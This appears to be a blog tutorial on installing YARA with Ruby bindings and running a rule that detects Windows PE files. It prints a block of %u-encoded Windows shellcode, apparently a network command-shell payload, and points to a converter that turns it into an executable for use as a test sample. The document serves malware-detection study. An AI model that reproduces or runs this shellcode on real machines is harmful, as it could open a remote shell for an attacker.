Having fun with yara and ruby

YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. (Source: http://code.google.com/p/yara-project/)

Installation

Initiate the installation process by installing ruby, gems, and pcre

yum install ruby ruby-devel rubygems pcre pcre-devel

Download and install YARA

wget http://yara-project.googlecode.com/files/yara-1.6.tar.gz
tar -xvf yara-1.6.tar.gz
cd yara-1.6
./configure
make
sudo make install

Install yara-ruby

gem install yara

Note: If you got an error such as "yada yada libyara.so.0: cannot open shared object file: No such file or directory yada yada" when you try to run your yara ruby application, you should add the path /usr/local/lib to the loader configuration file

sudo echo "/usr/local/lib" >> /etc/ld.so.conf
sudo ldconfig

Code

This is a sample code from yara-ruby to test the PE rule.

#!/usr/bin/env ruby
#
# Usage example:
#   ruby ispe.rb /win_c/windows/system32/*.???
#
#    yara-ruby - Ruby bindings for the yara malware analysis library.
#    Eric Monti
#    Copyright (C) 2011 Trustwave Holdings
#
#    This program is free software: you can redistribute it and/or modify it
#    under the terms of the GNU General Public License as published by the
#    Free Software Foundation, either version 3 of the License, or (at your
#    option) any later version.
#
#    This program is distributed in the hope that it will be useful, but
#    WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
#    or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
#    for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program. If not, see <http://www.gnu.org/licenses/>.
#

$: << File.join(File.dirname(__FILE__), '..', 'lib')
require 'rubygems'
require 'yara'

ctx = Yara::Rules.new

ctx.compile_string "rule IsPE { condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 }"

ARGV.each do |fname|
  ctx.scan_file(fname).each {|match| puts ">> #{fname} matched #{match.rule} rule" }
end

Shellcode

Below are the sample shellcode that we'll use to test the above PE rule. You can convert the shellcode to exe at this website, http://sandsprite.com/shellcode_2_exe.php

%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9%uadf5%uff57%u53d6%u5353%u4353%u4353%uff53%u68d0%ubeca%u2455%u6866%u611e%u5366%ue189%u6895%uf9ec%u60aa%uff57%u6ad6%u5110%uff55%u66d0%u646a%u6866%u6d63%u506a%u2959%u89cc%u6ae7%u8944%u31e2%uf3c0%u95aa%ufd89%u42fe%ufe2d%u2c42%u7a8d%uab38%uabab%u7268%ub3fe%uff16%u2875%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce%ud6ff%uff6a%u37ff%ud0ff%ue768%uc679%uff79%u0475%ud6ff%u77ff%ufffc%u68d0%uceef%u60e0%uff53%uffd6%u41d0

Testing

With the code and shellcode above, we can test the IsPE rule as a proof-of-concept on how brilliant YARA detect a file based on a rule given

[azizan@lab69 yara]# ruby test.rb shellcode.exe_
>> shellcode.exe_ matched IsPE rule
[azizan@lab69 yara]#

Credit:
- http://code.google.com/p/yara-project/
- https://github.com/SpiderLabs/yara-ruby